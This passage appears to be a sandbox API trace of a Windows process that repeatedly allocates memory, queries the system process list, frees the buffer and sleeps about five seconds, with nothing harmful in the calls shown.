FreeType=0x8000) returned 0x0 [0238.441] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.452] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.461] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.468] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.477] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.484] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.491] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.499] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.500] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.506] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.515] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.517] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.522] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.530] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.538] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.546] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.554] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.562] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.570] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.573] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.578] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.587] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.598] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.600] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.606] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 